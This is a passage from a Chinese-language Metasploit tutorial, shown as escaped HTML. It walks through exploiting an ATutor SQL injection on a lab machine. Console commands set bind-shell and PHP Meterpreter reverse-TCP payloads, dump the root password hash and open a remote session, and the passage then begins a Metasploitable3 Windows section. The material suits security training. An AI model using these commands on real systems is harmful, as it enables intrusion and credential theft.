java, ruby, dalvik, python, nodejs, firefox, zarch, r<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Needs <span class=\"hljs-attr\">Admin:<\/span> No<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Total <span class=\"hljs-attr\">size:<\/span> <span class=\"hljs-number\">0<\/span> <span class=\"hljs-attr\">Rank:<\/span> Normal<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Provided <span class=\"hljs-attr\">by:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">skape &lt;mmiller<span class=\"hljs-meta\">@hick<\/span>.org&gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Basic <span class=\"hljs-attr\">options:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Name Current Setting Required Description<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">---- --------------- -------- -----------<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">LPORT <span class=\"hljs-number\">4444<\/span> yes The listen port<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">RHOST no The target address<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Description:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Listen <span class=\"hljs-keyword\">for<\/span> a connection and spawn a command shell<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi<span class=\"hljs-regexp\">\/http\/<\/span>atutor_sqli) &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<p>3\u3001<code>generic\/shell_bind_tcp<\/code>\u662f\u4e00\u4e2a\u72ec\u7acb\u8f7d\u8377\u3002\u8981\u9009\u62e9\u5b83\u4f5c\u4e3a\u6709\u6548\u8f7d\u8377\uff0c\u6211\u4eec\u4f7f\u7528<code>set payload &lt;payload_name&gt;<\/code><\/p>\n<pre><code class=\"hljs linux copyable delphi\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi\/http\/atutor_sqli) &gt; <span class=\"hljs-keyword\">set<\/span> payload <span class=\"hljs-keyword\">generic<\/span>\/shell_bind_tcp<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">payload =&gt; <span class=\"hljs-keyword\">generic<\/span>\/shell_bind_tcp<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi\/http\/atutor_sqli) &gt; exploit<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span>.<span class=\"hljs-number\">177.139<\/span>:<span class=\"hljs-number\">80<\/span> - Dumping the username <span class=\"hljs-keyword\">and<\/span> password hash...<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable delphi\"><\/code><\/pre>\n<p>4\u3001\u4f7f\u7528<code>generic\/shell_bind_tcp<\/code>\u8f7d\u8377\u53ef\u7528\u5f97\u5230\u4e00\u4e2a\u901a\u7528\u7684<code>shell<\/code>\uff0c\u4f46\u8fdc\u8fdc\u4e0d\u591f\uff0c<code>PHP Meterprete<\/code>\u662f\u4e00\u4e2a\u7279\u6027\u4e30\u5bcc\u4e14\u66f4\u9ad8\u7ea7\u7684\u8f7d\u8377\uff0c\u6211\u4eec\u53ef\u4ee5\u7528\u5b83\u6765\u5229\u7528\u6b64\u6f0f\u6d1e\u3002<\/p>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/atutor_sqli) &gt; info payload\/php\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Name<\/span>: <span class=\"hljs-string\">PHP Meterpreter, PHP Reverse TCP Stager<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Module<\/span>: <span class=\"hljs-string\">payload\/php\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Platform<\/span>: <span class=\"hljs-string\">PHP<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Arch<\/span>: <span class=\"hljs-string\">php<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Needs<\/span> <span class=\"hljs-string\">Admin: No<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Total<\/span> <span class=\"hljs-string\">size: 1101<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Rank<\/span>: <span class=\"hljs-string\">Normal<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Provided<\/span> <span class=\"hljs-string\">by:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">egypt<\/span> <span class=\"hljs-string\">&lt;egypt@metasploit.com&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Basic<\/span> <span class=\"hljs-string\">options:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Name<\/span> <span class=\"hljs-string\">Current Setting Required Description<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-meta\">----<\/span> <span class=\"hljs-string\">--------------- -------- -----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">LHOST<\/span> <span class=\"hljs-string\">yes The listen address (an interface may be specified)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">LPORT<\/span> <span class=\"hljs-string\">4444 yes The listen port<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Description<\/span>:<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Run<\/span> <span class=\"hljs-string\">a meterpreter server in PHP. Reverse PHP connect back stager<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">with<\/span> <span class=\"hljs-string\">checks for disabled functions<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/atutor_sqli) &gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-attr\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/atutor_sqli)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">PAYLOAD<\/span> <span class=\"hljs-string\">php\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">PAYLOAD<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-string\">php\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/atutor_sqli)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Started<\/span> <span class=\"hljs-string\">reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">handler<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.139<\/span><span class=\"hljs-string\">:80<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Dumping<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">username<\/span> <span class=\"hljs-string\">and<\/span> <span class=\"hljs-string\">password<\/span> <span class=\"hljs-string\">hash...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.139<\/span><span class=\"hljs-string\">:80<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Got<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">root's<\/span> <span class=\"hljs-attr\">hash:<\/span> <span class=\"hljs-string\">9c352326223a09bc610ff4919e611bed3fbb28f5<\/span> <span class=\"hljs-string\">!<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">stage<\/span> <span class=\"hljs-string\">(38247<\/span> <span class=\"hljs-string\">bytes)<\/span> <span class=\"hljs-string\">to<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.139<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Meterpreter<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-number\">14<\/span> <span class=\"hljs-string\">opened<\/span> <span class=\"hljs-string\">(192.168.177.143:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.139<\/span><span class=\"hljs-string\">:51063)<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">2019-04-28 16:42:49<\/span> <span class=\"hljs-string\">+0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-type\">!]<\/span> <span class=\"hljs-string\">This<\/span> <span class=\"hljs-string\">exploit<\/span> <span class=\"hljs-string\">may<\/span> <span class=\"hljs-string\">require<\/span> <span class=\"hljs-string\">manual<\/span> <span class=\"hljs-string\">cleanup<\/span> <span class=\"hljs-string\">of<\/span> <span class=\"hljs-string\">'bgxx.php'<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">target<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-type\">!]<\/span> <span class=\"hljs-string\">This<\/span> <span class=\"hljs-string\">exploit<\/span> <span class=\"hljs-string\">may<\/span> <span class=\"hljs-string\">require<\/span> <span class=\"hljs-string\">manual<\/span> <span class=\"hljs-string\">cleanup<\/span> <span class=\"hljs-string\">of<\/span> <span class=\"hljs-string\">'\/var\/content\/module\/glt\/bgxx.php'<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">target<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">[+] 192.168.177.139:80 - Deleted bgxx.php<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter &gt; getuid<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Server username: Administrator (0)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter &gt; sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Computer : WIN-BGKRU85VR4H<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">OS : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Meterpreter : php\/windows<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter &gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<h4 class=\"heading\">4\u3001\u653b\u51fbWindows \u670d\u52a1\u5668<\/h4>\n<p>\u5229\u7528\u4e4b\u524d\u6536\u96c6\u7684\u4fe1\u606f\uff0c\u6211\u4eec\u5c06\u5bf9<code>Windows<\/code>\u670d\u52a1\u5668\u4f5c\u4e3a\u76ee\u6807\u8fdb\u884c\u6f0f\u6d1e\u5229\u7528\u3002\u672c\u8282\u6211\u4eec\u5c06\u4f7f\u7528<code>Metasploitable3<\/code>\u4f5c\u4e3a\u9776\u673a\u3002<\/p>\n<h5 class=\"heading\">\u51c6\u5907\u5de5\u4f5c<\/h5>\n<p>\u901a\u8fc7\u6536\u96c6\u7684\u4fe1\u606f\uff0c\u67e5\u627e\u6f0f\u6d1e\uff0c\u9009\u62e9\u5408\u9002\u7684\u6f0f\u6d1e\u91cc\u5229\u7528\u6a21\u5757\u3002<\/p>\n<p>\u4f7f\u7528<code>services<\/code>\u67e5\u770b\u76ee\u6807<code>Apache<\/code>\u670d\u52a1\u7248\u672c\u3002<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">services<\/span> <span class=\"hljs-string\">-p<\/span> <span class=\"hljs-number\">8020 <\/span><span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Services<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span 